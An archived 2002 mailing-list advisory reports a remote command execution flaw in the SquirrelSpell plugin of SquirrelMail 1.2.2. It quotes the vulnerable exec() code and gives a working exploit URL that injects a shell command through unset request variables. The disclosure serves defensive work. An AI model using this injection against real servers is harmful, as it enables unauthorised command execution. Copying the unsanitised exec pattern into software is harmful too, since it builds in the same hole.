squirrelmail bug

From: appelastat_private
Date: Thu Jan 24 2002 - 07:55:57 PST

Next message: RoMaNSoFt: "Re: PHP-Nuke allows Command Execution & Much more"

Previous message: bugzillaat_private: "[RHSA-2002:007-16] Updated 2.4 kernel available"
Next in thread: Konstantin Riabitsev: "Re: squirrelmail bug"
Reply: Konstantin Riabitsev: "Re: squirrelmail bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Squirrelmail remote execute commands bug

Version Affected :
1.2.2

Squirrelmail is a webmail system, which allows users to send, get, read etc.
mails. It has some themes, plugins etc. One of the plugins has a very 
interesting piece of code :

from file check_me.mod.php :

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt");
...
exec ("cat $floc | $sqspell_command", $sqspell_output);


Everything should be ok, but where this page includes config files, where 
are defined $attachment_dir and others ? Answer: Nowhere. We can set up 
variables $sqspell_command and $floc. Result ? We can execute any command
of course as a http serwer owner.

Exploit :

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

<appelastat_private>

Next message: RoMaNSoFt: "Re: PHP-Nuke allows Command Execution & Much more"
Previous message: bugzillaat_private: "[RHSA-2002:007-16] Updated 2.4 kernel available"
Next in thread: Konstantin Riabitsev: "Re: squirrelmail bug"
Reply: Konstantin Riabitsev: "Re: squirrelmail bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 24 2002 - 10:53:36 PST